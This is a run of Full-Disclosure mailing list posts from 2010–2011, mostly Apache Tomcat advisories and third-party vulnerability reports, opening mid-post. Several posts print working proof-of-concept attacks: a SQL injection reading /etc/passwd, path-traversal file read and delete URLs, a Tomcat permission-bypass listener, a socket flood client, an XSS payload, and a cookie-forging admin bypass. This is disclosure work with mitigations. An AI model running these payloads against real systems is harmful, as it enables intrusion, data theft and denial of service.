http://plone.org/products/plone-hotfix/releases/CVE-2011-0720/logchecker.py but with the /acl_users/ part absent. --- End Details --- On the matter of disclosure gap and necessary capabilities: I spent around 16 waking hours and 26 clock hours to go from having seen the original vulnerability announcement to exploiting. This is in my guess a high upper bound for the capabilities required to go from vuln to sploit. I had only user-level prior familiarity with Plone and no prior familiarity with Zope. To test if someone else could reasonably translate these public vulnerability details into an exploit, I presented the basic knowledge of Zope URL based invocation and how I found /acl_users/, and pointed to the above relevant patch over the course of 2 hours at a competition/talk on March 19th. Another individual was able to identify the appropriate function name and arguments with an additional hour, escalated to an administrator account, and vandalized a test site running for the occasion. http://www.skullspace.ca/blog/2011/03/hackathon-4-was-a-huge-success/ I regret that a recording was not made despite best efforts and that my slides are of such limited detail to not warrant publication. (this email has way more useful information) Though both myself and the other individual have programming backgrounds, I guess that a moderately determined individual without such capabilities could also close the disclosure gap. The crucial step of finding /acl_users/ with the find feature in ZMI is an interactive, play and use, kind of step. Finding the relevant function name is a matter of reading. The direct relationship between the method names and argument names with the URLs is spelled out in multiple Zope tutorials. Correct me if I'm wrong, but I believe this post is the first public comment to go beyond the patches, hotfix, and logchecker released by the Plone foundation. Mark Jenkins p.s. In the end, not quite: you'll have 30 minutes before the exploit worms start knocking on doors, I say. http://weblion.psu.edu/chatlogs/%23plone/2011/02/02.txt But probably not I have doubts if there will be an exploit script ever http://weblion.psu.edu/chatlogs/%23plone/2011/02/09.txt anymore... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2011-1183 Apache Tomcat security constraint bypass
CVE-2011-1183 Apache Tomcat security constraint bypass Severity: Important Vendor: The Apache Software Foundation Versions Affected: - Tomcat 7.0.11 - Earlier versions are not affected Description: A regression in the fix for CVE-2011-1088 meant that security constraints were ignored when no login configuration was present in the web.xml and the web application was marked as meta-data complete. Mitigation: Users of affected versions should apply one of the following mitigations: - Upgrade to a Tomcat 7.0.12 or later - Ensure a login configuration is defined in web.xml Credit: This issue was identified by the Apache Tomcat security team. References: http://tomcat.apache.org/security.html http://tomcat.apache.org/security-7.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2011-1475 Apache Tomcat information disclosure
CVE-2011-1475 Apache Tomcat information disclosure Severity: Important Vendor: The Apache Software Foundation Versions Affected: - Tomcat 7.0.0 to 7.0.11 - Earlier versions are not affected Description: Changes introduced to the HTTP BIO connector to support Servlet 3.0 asynchronous requests did not fully account for HTTP pipelining. As a result, when using HTTP pipelining a range of unexpected behaviours occurred including the mixing up of responses between requests. While the mix-up in responses was only observed between requests from the same user, a mix-up of responses for requests from different users may also be possible. Mitigation: Users of affected versions should apply one of the following mitigations: - Upgrade to a Tomcat 7.0.12 or later - Switch to the NIO or APR/native HTTP connectors that do not exhibit this issue Credit: This issue was identified by Brad Piles and reported via the public ASF Bugzilla issue tracking system. The Apache Tomcat security team requests that security vulnerability reports are made privately to secur...@tomcat.apache.org in the first instance. References: http://tomcat.apache.org/security.html http://tomcat.apache.org/security-7.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 'Andy's PHP Knowledgebase' SQL Injection Vulnerability (CVE-2011-1546)
'Andy's PHP Knowledgebase' SQL Injection Vulnerability (CVE-2011-1546) Mark Stanislav - mark.stanis...@gmail.com I. DESCRIPTION --- A vulnerability exists in a_viewusers.php allowing for SQL injection of the 's' query parameter. II. TESTED VERSION --- 0.95.2 III. PoC EXPLOIT --- http://www.example.com/aphpkb/a_viewusers.php?s=1%20UNION%20SELECT%20load_file(0x2f6574632f706173737764),null,null,null,null,null,null%20limit%200 IV. SOLUTION --- Upgrade to 0.95.3 or above. V. REFERENCES --- http://www.aphpkb.org/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1546 http://www.uncompiled.com/2011/03/cve-2011-1546/ VI. TIMELINE --- 03/13/2011 - Initial vendor disclosure 03/16/2011 - Vendor patched and released an updated version 03/16/2011 - Confirmed fix disclosure date 03/30/2011 - Public disclosure ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2011-1088 Apache Tomcat security constraint bypass
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2011-1088 Apache Tomcat security constraint bypass Severity: Important Vendor: The Apache Software Foundation Versions Affected: - - Tomcat 7.0.0 to 7.0.10 - - Earlier versions are not affected Description: When a web application was started, @ServletSecurity annotations were ignored. This meant that some areas of the application may not have been protected as expected. Mitigation: Users of affected versions should apply one of the following mitigations: - - Upgrade to a Tomcat version where this issue is fixed - - Define security constraints via an alternative mechanism such as web.xml Credit: This issue was reported publicly on the Tomcat users mailing list. The Apache Tomcat security requests that security vulnerability reports are made privately to secur...@tomcat.apache.org in the first instance. References: http://tomcat.apache.org/security.html http://tomcat.apache.org/security-7.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQIcBAEBAgAGBQJNfycmAAoJEBDAHFovYFnn3jgP/0aecIt4uUYHWbmzUPA0FNan tzjVfPskwPYrSuNbHjHuxPknmxUPSFiCdO3V1LLtnCX2y5+cNancWRjLX7lDbt8H sL+9AaoI8HDShG1wgYsnh/3fIKczhE28pTtyo0GtG4HpQVLcT/OH2Qhb6+mG3jwo SCia1eSTJuhj5HM3n2fb5X33n/UEkX/cCALDrt1DRfKV69MaZbMiZh7XfpyVDpdN LePYIeuOoxg9CVjkDYCVIaK5Bi0uzPD8yCc73dOU3YobgbDDaLSN7Awd1/RhO5TR fpWVbl0gbmMlPnMy52B9qZL+H9HwcNnYPqbtpquE2a6ik29QT4LMTNo0mr25XxmP K3Jb7VTcVb/P1pxFOsTyMWy25IFubMEBW4c3kafBZGUI3Q25QmNizBXZ5wvn1vex kBzDZrnKmkzvhnCy6RnTKk9BYGRWEw9ImTqLOaLxmtXJw9bnWgoeusnje1k/24QI 3+pw/g5OjwG7hqtStrscFeo8tc/snXBojn1d21txsnLggQ0E6+9+vUVym5tBD16I MfzN7FSd620AFSmVUo5mEfEpDe+RTkA8y/7BnYHoguBQ7WLlxejCgRpaf91vBns6 ZEQGntzx7EW7M+P2GNHy1mrVGTQ7Glk/5tnAFyqgMOHzYyN11Y3OWO1XBv+1um8q kadENSXz4mY0vKtvaeuT =i/HJ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 'Quick Polls' Local File Inclusion Deletion Vulnerabilities (CVE-2011-1099)
'Quick Polls' Local File Inclusion Deletion Vulnerabilities (CVE-2011-1099) Mark Stanislav - mark.stanis...@gmail.com I. DESCRIPTION --- Two vulnerabilities exist in 'Quick Polls' providing local file inclusion local file deletion due to null-byte attacks against functions in index.php. II. TESTED VERSION --- 1.0.1 III. PoC EXPLOITS --- LFI: http://example.com/quickpolls/?fct=previewp=../../../../../../../etc/passwd%00 LFD: http://example.com/quickpolls/?fct=deletep=../../../../../../../tmp/foobar%00 IV. NOTES --- * magic_quotes_gpc must be disabled for null-byte attacks to work V. SOLUTION --- Upgrade to 1.0.2 or above VI. REFERENCES --- http://www.focalmedia.net/create_voting_poll.html http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1099 http://www.uncompiled.com/2011/03/quick-polls-local-file-inclusion-deletion-vulnerabilities-cve-2011-1099/ VII. TIMELINE --- 02/05/2011 - Initial vendor disclosure 02/07/2011 - Vendor patched and released an updated version 02/07/2011 - Confirmed public disclosure date with vendor 03/06/2011 - Public disclosure ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2010-3718 Apache Tomcat Local bypass of security manger file permissions
CVE-2010-3718 Apache Tomcat Local bypass of security manger file permissions
Severity: Low
Vendor: The Apache Software Foundation
Versions Affected:
- Tomcat 7.0.0 to 7.0.3
- Tomcat 6.0.0 to 6.0.?
- Tomcat 5.5.0 to 5.5.?
- Earlier, unsupported versions may also be affected
Description:
When running under a SecurityManager, access to the file system is
limited but web applications are granted read/write permissions to the
work directory. This directory is used for a variety of temporary files
such as the intermediate files generated when compiling JSPs to Servlets.
The location of the work directory is specified by a ServletContect
attribute that is meant to be read-only to web applications. However,
due to a coding error, the read-only setting was not applied. Therefore
a malicious web application may modify the attribute before Tomcat
applies the file permissions. This can be used to grant read/write
permissions to any area on the file system which a malicious web
application may then take advantage of.
This vulnerability is only applicable when hosting web applications from
untrusted sources such as shared hosting environments.
Example (AL2 licensed):
Listener source
---
package listeners;
import javax.servlet.ServletContext;
import javax.servlet.ServletContextEvent;
import javax.servlet.ServletContextListener;
public final class FooListener implements ServletContextListener {
public void contextInitialized(ServletContextEvent event) {
ServletContext context = event.getServletContext();
java.io.File workdir = (java.io.File) context
.getAttribute(javax.servlet.context.tempdir);
if (workdir.toString().indexOf(..) 0) {
context.setAttribute(javax.servlet.context.tempdir,
new java.io.File(workdir, ../../../../conf));
}
}
public void contextDestroyed(ServletContextEvent event) {
}
}
web.xml snippet
---
listener
listener-classlisteners.FooListener/listener-class
/listener
Mitigation:
Users of affected versions should apply one of the following mitigations:
- Upgrade to a Tomcat version where this issue is fixed
- Undeploy all web applications from untrusted sources
Credit:
The issue was identified by the Tomcat security team.
References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
http://tomcat.apache.org/security-5.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2010-3718 Apache Tomcat Local bypass of security manger file permissions
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
CVE-2010-3718 Apache Tomcat Local bypass of security manger file permissions
Severity: Low
Vendor: The Apache Software Foundation
Versions Affected:
- - Tomcat 7.0.0 to 7.0.3
- - Tomcat 6.0.0 to 6.0.?
- - Tomcat 5.5.0 to 5.5.?
- - Earlier, unsupported versions may also be affected
Description:
When running under a SecurityManager, access to the file system is
limited but web applications are granted read/write permissions to the
work directory. This directory is used for a variety of temporary files
such as the intermediate files generated when compiling JSPs to Servlets.
The location of the work directory is specified by a ServletContect
attribute that is meant to be read-only to web applications. However,
due to a coding error, the read-only setting was not applied. Therefore
a malicious web application may modify the attribute before Tomcat
applies the file permissions. This can be used to grant read/write
permissions to any area on the file system which a malicious web
application may then take advantage of.
This vulnerability is only applicable when hosting web applications from
untrusted sources such as shared hosting environments.
Example (AL2 licensed):
Listener source
- ---
package listeners;
import javax.servlet.ServletContext;
import javax.servlet.ServletContextEvent;
import javax.servlet.ServletContextListener;
public final class FooListener implements ServletContextListener {
public void contextInitialized(ServletContextEvent event) {
ServletContext context = event.getServletContext();
java.io.File workdir = (java.io.File) context
.getAttribute(javax.servlet.context.tempdir);
if (workdir.toString().indexOf(..) 0) {
context.setAttribute(javax.servlet.context.tempdir,
new java.io.File(workdir, ../../../../conf));
}
}
public void contextDestroyed(ServletContextEvent event) {
}
}
web.xml snippet
- ---
listener
listener-classlisteners.FooListener/listener-class
/listener
Mitigation:
Users of affected versions should apply one of the following mitigations:
- - Upgrade to a Tomcat version where this issue is fixed
- - Undeploy all web applications from untrusted sources
Credit:
The issue was identified by the Tomcat security team.
References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
http://tomcat.apache.org/security-5.html
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iQIcBAEBAgAGBQJNTLBXAAoJEBDAHFovYFnnkQkQAIpE68EHXYnu70xHFThPVGPk
48OIvAA2fMzF8RajaGQRkOS3WXrzPdbjf8AXjUmZ/E3Yr+4XdP2kmDMGsW9hs/Vw
x2fXYfyBQQQMdKVnSVr3cMSPs+RhnSpPI1wsQUWnp0xZNez/9VkSDeINq8JFGXLB
5NgkQZ4+6UBBl2K/mtkVxZHnXi1y9ulvhaQ95jCTt7mzOUJrlq8NXWaEW1njtGAO
7Z6KBMn6PQkzx1k38TG6kPBN331fWWE2WhSimMkX1Q8jfI5f0PVPaQELPKieSf7x
G0zCfQ8aH0q4Kn0jsvvmP43mzCz3PbBwOpFZgPO0vcA5usXwFXGTJCKAhhCTy0CG
q9Sjxb8hLyEwg0vIrvzzlPj6g8mm6syW7Db4R4F3vW/ovCWgVdRFMhl0e/KX3nfG
MWSYq/x4wFj470/j5Ak7wz2y/GAiX9LiEwhFlEWL/SOevY9/u3l9dXIUbcYUG3mS
4dBpthU5eJc2vbdp+gtAPoJexxS9nZhCfbcNjV5HbdRHhn1dIaJhR3KYnqQU2wX2
CG2srHqTJ+3aW969nhHxgpiLmElmDlWHMNQmDDDaY9CDC2i3ZNdw4uBes4nRc7Xg
/1LQvx7pSnAidrQa6CcOjsf4usBQ6faO0zeuri9l6jwFDfwHiL/TuNzNxgmbR8BC
DgZJ/zI6FepuWKA4CV7t
=uz7D
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] Oracle JVM bug causes denial of service in Apache Tomcat
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 The original report is [1]. Tomcat is affected when accessing a form based security constrained page or any page that calls javax.servlet.ServletRequest.getLocale() or javax.servlet.ServletRequest.getLocales(). Work-arounds have been implemented in the following versions: - - 7.0.8 (released) - - 6.0.32 (released) - - 5.5.33 (released expected Monday 7 Feb 2011) All users are recommended to upgrade to a Tomcat version with the work-around. Users unable to upgrade can filter malicious requests via a Servlet filter, an httpd re-write rule (if Tomcat is behind an httpd reverse proxy) or other filtering as available. Accept-Language headers that are compliant with RFC 2616 can not trigger this bug. Therefore, filtering out all request with non-compliant headers will provide protection against the DOS vulnerability. The Apache Tomcat Security Team [1] http://www.exploringbinary.com/java-hangs-when-converting-2-2250738585072012e-308/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQIcBAEBAgAGBQJNTLBnAAoJEBDAHFovYFnnk0IQAOB6xo9/wEqckNzq/MUxfxH8 c131gJ0XcMktGZ7x7A2/SgG/oIfl5B4q78EujtPwHsy8XS9XRKCdJtOz8Ak67zb7 z6UhB+ha2R0fgzJoesZeBiHyH4vymB8izF9npnDuFv+Gij7K08mu5bERMCNNQftc +/0a7I2QD/K5YoqkYW/1RLwWhrbAXmjE8ysmnTtgfemRxmGL971bx8+9+l9JmGpm unP+yVYpKNnGXNUSNuL9C0oka2iCzkrPW0UplZyyMsB2iiuKetYESL9KR1rEvxA6 OL4FmS0OxzyPO0UwXFd6qJxc6L2BaWLdhyu7Qp/WnWDFsPDdGa7J87i4WeMsNb2D GYk+9TNV4S2QOCK1dFuARvCY74QykuthBEUHmCJUOT5fUt3NtGXjMTvBTWZUGIbg Eqe5nfGxLB2ZcimWoYUKoYJe31/DY8lBFVPl4KVIUlcQ0RLjnE7JqbSey8ZrHZ4o FY9ZA74ndDUjEaJpwgRVHN6FO7Sts+wDPATYZVvO3lPb0pzwGTBFPAcSiysqbiJT njwUBWfz5e7cpXpHvCPyh0PGY6giHticXplhKsq9M/ZK1G6ZzFXbBwlACUfLGFK7 Pt4af26arAlcoapJ0PG8AXGPZLztzLVR1jaNBJ9900gIZ/OI5cmZ9n23l0viTtEf v/8kgZ+3uv6vRb3+wrXH =oxMp -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2011-0534 Apache Tomcat DoS vulnerability
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
CVE-2011-0534 Apache Tomcat DoS vulnerability
Severity: Important
Vendor: The Apache Software Foundation
Versions Affected:
- - Tomcat 7.0.0 to 7.0.6
- - Tomcat 6.0.0 to 6.0.30
Description:
Tomcat did not enforce the maxHttpHeaderSize limit while parsing the
request line in the NIO HTTP connector. A specially crafted request
could trigger an DoS via an OutOfMemoryError.
Example (AL2 licensed):
package bug50631;
import java.io.OutputStream;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.net.SocketAddress;
public class FloodClient1 {
static final int k_step = 10;
static byte[] value = new byte[k_step * 1024];
public static void main(String[] args) throws Exception {
int i = 0;
while (i value.length) {
value[i++] = 13;
}
SocketAddress addr = new InetSocketAddress(localhost, 8080);
Socket socket = new Socket();
socket.setSoTimeout(0);
socket.connect(addr, 0);
OutputStream os = socket.getOutputStream();
// InputStream is = socket.getInputStream();
int k = k_step;
int m = 0;
int k100 = 100;
while (m 2000) {
if (k = k100) {
k100 += 100;
System.out.print('.');
System.out.flush();
}
if (k = 1024) {
m++;
k -= 1024;
k100 = 100;
System.out.println( + m + Mb);
}
os.write(value);
os.flush();
Thread.sleep(1);
k+=k_step;
}
}
}
Mitigation:
Users of affected versions should apply one of the following mitigations
- - Upgrade to a Tomcat version where this issue is fixed
- - Use a BIO or AJP HTTP connector in place of an NIO HTTP connector
Credit:
The issue was identified by the Tomcat security team.
References:
https://issues.apache.org/bugzilla/show_bug.cgi?id=50631
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iQIcBAEBAgAGBQJNTLBxAAoJEBDAHFovYFnnVFsQAIE5bU+2aJccXjnlYkEZAr4S
aXmHOCqTOzaW5ob3hPhpFmOwZx3Miabx9fJPRGnCb8CEihz00soYbMcTRHbgDqXA
d/bXMr4xjZF80AM/cWng0vmDbgnLbhVUkGwNqLtuU2rjyxfnRNKBkc0CDIoDQ1FV
zkm5uW9DYTpCmcRo13IhCPanY1DRA/+QiUxriofeUPuz6skiUuyBiY95GDQNOvSo
GofEJt39DBnPDb2kzonkQTERo2OgSIPDgLeas3/pawHGsQXaBH3dwOsRQESExJS+
kT5xuhUuqynWNGXnimG0x8yCDe7+SujiAmSjTSrblBIanOtIt3SxjSe9+SasSQih
jNO/M87aQ/znmlIlVeS4F+OFuWSuBUB+GjpZn1L77pG+/yWiHurhUuAXM2borB9c
I45c2yuYstki7ej9buHXpy5l4d6A28FT61V6E2sENM9RMMHFY7cUJmorbsBf1qj2
ei+h9QEcNiwg/on0apg9pU+B1PCZxGR7G/8aMCXFfkri4opeAXy7ZpJfk+k2zI64
S8edezROjZxgztqZKydpFn2MrQ9tUmoioZHUEiZqAuPVfszXvUdLZsSFh+7A6+4D
jL+T7jIt9wsCxsZJ1+8X03nEkD7Yop+kHvUmMjyM4XEKLReI+PoXfYBrNou7Nhvm
niulExg4qtuJplCbEw8k
=06CU
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2011-0013 Apache Tomcat Manager XSS vulnerability
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
CVE-2011-0013 Apache Tomcat Manager XSS vulnerability
Severity: Low
Vendor: The Apache Software Foundation
Versions Affected:
- - Tomcat 7.0.0 to 7.0.5
- - Tomcat 6.0.0 to 6.0.29
- - Tomcat 5.5.0 to 5.5.31
- - Earlier, unsupported versions may also be affected
Description:
The HTML Manager interface displayed web applciation provided data, such
as display names, without filtering. A malicious web application could
trigger script execution by an administartive user when viewing the
manager pages.
Example:
display-namelt;scriptgt;alert('hi');lt;/scriptgt;/display-name
Mitigation:
Users of affected versions should apply one of the following mitigations:
- - Upgrade to a Tomcat version where this issue is fixed
- - Undeploy untrusted web applications
- - Remove the Manager application
Credit:
The issue was identified by the Tomcat security team.
References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
http://tomcat.apache.org/security-5.html
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iQIcBAEBAgAGBQJNTLB+AAoJEBDAHFovYFnnul0P/iupVkfHFjgIN5rkDHVoArfU
MkIcm5GMCqb1d0th8JmEtoFlI09sTJdGwyUbiC4hnuj/lA+BJuW/wDSzM2esfXGX
okraVm1SI6eI5DceQf/QzPZ9FIq3Z8mqixzBX959aQY1+JnW3Ah4vIYvZpaKpyi+
BMIj0JtIVEVNajAnUYQn9ruZg9FFX+t1Ajb6n+CJV3D4ux7XMGLFv2y5XPwVwJXm
AP/0jAHoMbjaRMwHrUxgkIDMpwpOcHFIfFq7zHjo9OTtL2LJ+vrB3FlxV6rZygMt
gwPeDeUoCCphrf1UncUzckW280/WGfsr3xncNEOpCG3o6xQkRV8eoGNikw5xZ2U8
YxLr4RdpJemUhx94jDYiMdT/gYyHbMfHtVsG3VObFp2yEjnLHU7HI6tI3C617nau
Czg1Z/YqnUvZfGDQDL5bXkF6dlWav9CmXuXht7gS3yskkYIJPJn0oZhAYweznK+v
Ua3jqNvsVktsGd76UtRh246Js6ie4EYmusZ3LqJQmsbkoPxkcAFuHCkZqVBR37SF
tt9yI7qUAb+022L+EGQkmjfcy0O9e4WKMXwf5ocywSDVAJH2/EuGTY1vAojHqGNO
hM88fdKus3Vfvj4vqzkAH+4LpdpPmK80xl+KxSJMBg+cWYLe6OGYEL7FbdoswcRv
cNZcMy4fbYmWPQkY+miZ
=sDwq
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 'Seo Panel' Cookie-Rendered Persistent XSS Vulnerability (CVE-2010-4331)
'Seo Panel' Cookie-Rendered Persistent XSS Vulnerability (CVE-2010-4331) Mark Stanislav - mark.stanis...@gmail.com I. DESCRIPTION --- A vulnerability exists in 'Seo Panel' page rendering which allows for unfiltered, unencrypted content to be presented to a user through two different cookies. II. TESTED VERSION --- 2.2.0 III. PoC EXPLOIT --- Alter the value of cookies called 'default_news' or 'sponsors' and then view a site page which includes controllers/index.ctrl.php or controllers/settings.ctrl.php that will render the cookies as they exist on the user's machine. IV. NOTES --- * The 'default_news' cookie doesn't require a user to be authenticated whereas 'sponsors' does * The disclosure date was pushed a full month so that a fix could be released but no update was released yet * Based on discussions with the developer, they will likely encrypt the cookie contents to prevent this issue V. SOLUTION --- Upgrade to a release 2.2.0 when available or otherwise disable cookie rendering. VI. REFERENCES --- http://www.seopanel.in/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4331 http://www.uncompiled.com/2011/01/seo-panel-cookie-rendered-persistent-xss-vulnerability-cve-2010-4331/ VII. TIMELINE --- 11/24/2010 - Initial vendor disclosure 11/25/2010 - Vendor response and commitment to fix 11/25/2010 - Reply to vendor detailing potential fixes and an adjusted public disclosure date 11/25/2010 - Vendor response confirming desired public disclosure date and agreement to patch method 01/15/2011 - Public disclosure ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] HyperStrike Integration with Snap Fitness, SSO Bypass Vulnerability
HyperStrike Integration with Snap Fitness, SSO Bypass Vulnerability Mark Stanislav - mark.stanis...@gmail.com I. DESCRIPTION --- A vulnerability existed within the single sign-on (SSO) integration of HyperStrike and Snap Fitness websites. By altering the defined 'memberid' parameter passed within the site-integration query string, varied amounts of member data could be retrieved depending on the account activation status and HyperStrike usage of a given Snap Fitness member. II. ACCOUNTS AFFECTED --- 90,000+ III. VULNERABILITY VERIFICATION PROCESS --- * Script #1: Starting at an arbitrary number, I looped through 10,000 sequential 'memberid' values for Snap Fitness (gymid '21'). Roughly 2,700 accounts existed in either an 'activated' or 'unactivated' state. * Script #2: Starting at a different arbitrary number, I looped through 1,000 sequential 'memberid' values for Snap Fitness. The specific purpose of this loop was to look for only activated accounts. Of the 1,000 'memberid' values checked, 76 accounts were activated. Based on simple regular expression checks, I verified that one user's profile had a picture, eight users had listed phone numbers, and at least one user had a medical questionnaire filled-out. This is all in addition to standard PII available. IV. POTENTIAL ACCOUNT DATA AT RISK --- * Activated Account: Photo, First Name, Last Name, Date of Birth, Gender, E-Mail Address, Phone Number, Height, Weight, Body Fat %, Timezone, Gym Membership Company, Workout Schedule, and Medical History (blood pressure issues, heart problems, recent surgery, pregnancy, diabetes, etc.) * Unactivated Account: First Name, Last Name, Date of Birth, Gender, and E-Mail Address V. VULNERABLE URL FORMAT --- http://www.hyperstrike.com/diff/partners/snap/member_activate.aspx?memberid=[memberid_integer]gymid=[gymid_integer] VI. NOTES --- * Because Snap Fitness apparently provides HyperStrike with customer data before a customer agrees to sign-up with HyperStrike, customers of Snap Fitness had their personal details (as explained above for 'Unactivated Account') available to be taken without ever agreeing to use HyperStrike services or even know about the company. * All account data collected during the vulnerability verification process was erased and at no time was any Snap Fitness/HyperStrike customer's data given to any individual. * There is no known and/or reported breach of customer information. Ideally I was the first and only person to find this issue before it was a threat to customer privacy. * No previous session, cookie, authentication, authorization, or otherwise was required to retrieve private member data. No 'spoofing' or 'hacking' occurred whatsoever. * As an aside, the language towards me from Michael Greeves (and CC: inclusion of legal staff) became accusatory rather than appreciative after a few e-mails. The notification letter shown below that was presented to members treats the situation seemingly as a breach by some nefarious person rather than a disclosure by a responsible IT professional. Needless to say, not everyone knows how to say 'thanks for preventing a huge lawsuit' very well it would seem ;) VII. REMEDIATION --- The previously implemented single sign-on wasn't configured properly for the integration between Snap Fitness and HyperStrike. After notice was given by HyperStrike that the issue was remediated, I verified that the previous SSO bypass was no longer functional. VIII. REFERENCES --- http://www.hyperstrike.com/ http://www.snapfitness.com/ http://www.uncompiled.com/2010/12/hyperstrike-integration-with-snap-fitness-sso-bypass-vulnerability/ IX. TIMELINE --- 08/29/2010 - Vulnerability found and verified 08/29/2010 - E-mail to HyperStrike disclosing the vulnerability and asking for a response to start the remediation process 09/07/2010 - Follow-up call to HyperStrike after not receiving a response in the prior days 09/07/2010 - Call from Michael Greeves, CEO of HyperStrike to discuss the vulnerability; promised 24-hour follow-up regarding remediation 09/07/2010 - Resent original disclosure e-mail + complete vulnerability report to Michael 09/17/2010 - Follow-up e-mail to Michael with regard to the remediation status of the vulnerability 09/17/2010 - Response from Michael stating a call was to be occurring with Snap Fitness that day about the issue 09/21/2010 - Response from Michael stating that they are working to remedy the issue and asking me to delete all customer data 09/22/2010 - E-mail sent to Michael reassuring him that as my report nearly a month prior stated, no customer data was kept 09/23
Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC
i was joking about the history of the s boxes, originally designed by ibm but with substantial classified input from nsa. suspicious people believed the s box changes (and the reduced key length) that was adopted was intended to weaken des, or make it more brute-forceable by the nsa. the designers deny it. the parallels between that situation and this should be evident. On Dec 16, 2010, at 4:26 AM, Abuse007 wrote: Changing the s-boxes in DES (and therefore Triple DES as well) would break comparability with other implementations as it would no longer decrypt the same as a standard implementation. for more you can see, among others http://www.wordiq.com/definition/DES#NSA.27s_involvement_in_the_design ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 'Pointter PHP Content Management System' Unauthorized Privilege Escalation (CVE-2010-4332)
'Pointter PHP Content Management System' Unauthorized Privilege Escalation (CVE-2010-4332) Mark Stanislav - mark.stanis...@gmail.com I. DESCRIPTION --- A vulnerability exists in the 'Pointter PHP Content Management System' authentication system which allows for administrative privileges by crafting two specific cookies with arbitrary values. II. TESTED VERSION --- 1.0 III. PoC EXPLOIT --- Using whatever method you prefer, generate 'auser' and 'apass' cookies. The values of each cookie are irrelevant; the mere presence of the cookies provide the administrative privilege. IV. NOTES --- * Here's a snippet of the final reply that I received from the vendor: Of course, it could be made safer and we know how to do it. But we have designed the softwares so that renaming admin folder gives us less work. As you know, the users should know the security issues as they will run this and not us. V. SOLUTION --- * There is no update released at this time. Avoidance of this software is recommended until an updated version is available. VI. REFERENCES --- http://www.pointter.com/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4332 http://www.uncompiled.com/2010/12/pointter-php-content-management-system-unauthorized-privilege-escalation-cve-2010-4332/ VII. TIMELINE --- 11/23/2010 - Initial vendor disclosure e-mail sent 11/24/2010 - Reply from vendor informing me that my 'software manipulation' was illegal 11/24/2010 - Response to vendor regarding their accusation of illegal actions on my part 11/24/2010 - Reply from vendor stating that by releasing this information, I am committing a crime 11/24/2010 - Response to vendor that their software is CC-licensed and that their accusations are unfounded 11/24/2010 - Rebuttal from vendor again affirming I was breaking the law by disclosing this vulnerability 11/24/2010 - Reply to vendor again stating my intent to help the company and provide responsible disclosure 11/24/2010 - Response from vendor stating they would no longer respond and explained their stance on fixing this issue 11/24/2010 - Final reply to vendor stating that I was happy to work with them on a delayed disclosure if desired 12/15/2010 - Public disclosure ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
